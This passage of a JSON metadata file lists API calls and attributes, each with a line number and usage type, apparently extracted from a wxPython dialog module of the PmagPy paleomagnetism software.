"attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2648, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2648, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2649, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2649, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 2651, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 2651, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 2651, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 2652, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2655, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2655, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 2671, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2677, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2677, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 2679, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2679, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic.utrecht", "line_number": 2736, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2736, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2738, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2738, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2740, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2740, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2746, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2746, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.utrecht", "line_number": 2746, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2746, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 2750, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2758, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2758, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2759, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2759, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 2762, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2762, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 2780, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2780, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2784, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2784, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2787, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2787, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2788, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2788, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 2798, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2801, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2801, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 2814, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2814, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 2817, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.run_command_and_close_window", "line_number": 2819, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2819, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2822, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2822, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 2832, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 2834, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 2834, "usage_type": "attribute"}, {"api_name": "sys.platform", "line_number": 2841, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 2842, "usage_type": "call"}, {"api_name": "wx.SIMPLE_BORDER", "line_number": 2842, "usage_type": "attribute"}, {"api_name": "wx.ALWAYS_SHOW_SB", "line_number": 2842, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 2844, "usage_type": "call"}, {"api_name": "wx.SIMPLE_BORDER", "line_number": 2844, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 2859, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2859, "usage_type": "attribute"}, {"api_name": "pmagpy.pmag.magic_read_dict", "line_number": 2860, "usage_type": "call"}, {"api_name": "pmagpy.pmag", "line_number": 2860, "usage_type": "name"}, {"api_name": "wx.EVT_MENU", "line_number": 2867, "usage_type": "attribute"}, {"api_name": "pmagpy.mapping.map_magic.mapping", "line_number": 2913, "usage_type": "call"}, {"api_name": "pmagpy.mapping.map_magic", "line_number": 2913, "usage_type": "name"}, {"api_name": "pmagpy.mapping.map_magic.magic3_2_orient_magic_map", "line_number": 2913, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 2925, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 2925, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 2925, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 2925, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2927, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 2928, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2928, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 2929, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 2929, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 2930, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 2931, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 2931, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 2932, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 2933, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 2933, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 2934, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 2936, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 2937, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2939, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2939, "usage_type": "attribute"}, {"api_name": "wx.CENTRE", "line_number": 2941, "usage_type": "attribute"}, {"api_name": "wx.CENTRE", "line_number": 2942, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 2942, "usage_type": "attribute"}, {"api_name": "wx.CENTRE", "line_number": 2944, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 2945, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2946, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2946, "usage_type": "attribute"}, {"api_name": "sys.platform", "line_number": 2948, "usage_type": "attribute"}, {"api_name": "wx.EVT_CLOSE", "line_number": 2953, "usage_type": "attribute"}, {"api_name": "dialogs.magic_grid2.MagicGrid", "line_number": 2983, "usage_type": "call"}, {"api_name": "dialogs.magic_grid2", "line_number": 2983, "usage_type": "name"}, {"api_name": "dialogs.drop_down_menus3.Menus", "line_number": 3042, "usage_type": "call"}, {"api_name": "dialogs.drop_down_menus3", "line_number": 3042, "usage_type": "name"}, {"api_name": "wx.grid", "line_number": 3043, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 3048, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 3076, "usage_type": "call"}, {"api_name": "wx.FD_OPEN", "line_number": 3080, "usage_type": "attribute"}, {"api_name": "wx.FD_CHANGE_DIR", "line_number": 3080, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3082, "usage_type": "attribute"}, {"api_name": "pmagpy.pmag.magic_read_dict", "line_number": 3085, "usage_type": "call"}, {"api_name": "pmagpy.pmag", "line_number": 3085, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 3102, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3102, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 3118, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 3118, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 3118, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3133, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3154, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 3179, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 3180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3180, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 3180, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 3182, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3182, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 3182, "usage_type": "call"}, {"api_name": "pmagpy.ipmag.orientation_magic", "line_number": 3188, "usage_type": "call"}, {"api_name": "pmagpy.ipmag", "line_number": 3188, "usage_type": "name"}, {"api_name": "wx.MessageDialog", "line_number": 3196, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 3196, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 3196, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 3203, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 3203, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 3203, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 3214, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 3214, "usage_type": "attribute"}, {"api_name": "wx.CANCEL", "line_number": 3214, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3216, "usage_type": "attribute"}, {"api_name": "wx.ID_CANCEL", "line_number": 3222, "usage_type": "attribute"}, {"api_name": "wx.Dialog", "line_number": 3229, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 3240, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 3241, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 3241, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3247, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3247, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3247, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 3247, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3250, "usage_type": "call"}, {"api_name": "wx.RB_GROUP", "line_number": 3250, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3253, "usage_type": "call"}, {"api_name": "wx.RadioButton", "line_number": 3256, "usage_type": "call"}, {"api_name": "wx.RadioButton", "line_number": 3259, "usage_type": "call"}, {"api_name": "wx.RadioButton", "line_number": 3262, "usage_type": "call"}, {"api_name": "wx.RadioButton", "line_number": 3265, "usage_type": "call"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3272, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3272, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3272, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 3272, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 3273, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 3273, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3276, "usage_type": "call"}, {"api_name": "wx.RB_GROUP", "line_number": 3276, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3277, "usage_type": "call"}, {"api_name": "wx.TextCtrl", "line_number": 3278, "usage_type": "call"}, {"api_name": "wx.CENTER", "line_number": 3278, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3279, "usage_type": "call"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3296, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3296, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3296, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 3296, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3299, "usage_type": "call"}, {"api_name": "wx.RB_GROUP", "line_number": 3300, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3303, "usage_type": "call"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3313, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3313, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3313, "usage_type": "attribute"}, {"api_name": "wx.HORIZONTAL", "line_number": 3313, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 3317, "usage_type": "call"}, {"api_name": "wx.CENTER", "line_number": 3317, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 3318, "usage_type": "call"}, {"api_name": "wx.TE_CENTER", "line_number": 3319, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 3328, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 3328, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 3329, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 3329, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 3330, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 3332, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 3332, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 3333, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 3353, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 3353, "usage_type": "attribute"}, {"api_name": "wx.ID_CANCEL", "line_number": 3370, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 3396, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 3396, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 3396, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3421, "usage_type": "attribute"}, {"api_name": "wx.Dialog", "line_number": 3425, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 3435, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 3436, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 3436, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3442, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3442, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3442, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 3442, "usage_type": "attribute"}, {"api_name": "wx.CheckBox", "line_number": 3443, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3444, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3445, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3446, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3447, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3448, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3449, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3450, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3451, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3452, "usage_type": "call"}, {"api_name": "wx.BOTTOM", "line_number": 3456, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3462, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3462, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3462, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 3462, "usage_type": "attribute"}, {"api_name": "wx.CheckBox", "line_number": 3463, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3464, "usage_type": "call"}, {"api_name": "wx.BOTTOM", "line_number": 3466, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 3467, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 3473, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 3473, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 3474, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 3474, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 3475, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 3477, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 3477, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 3478, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 3491, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 3491, "usage_type": "attribute"}, {"api_name": "wx.ID_CANCEL", "line_number": 3500, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3545, "usage_type": "attribute"}]}
|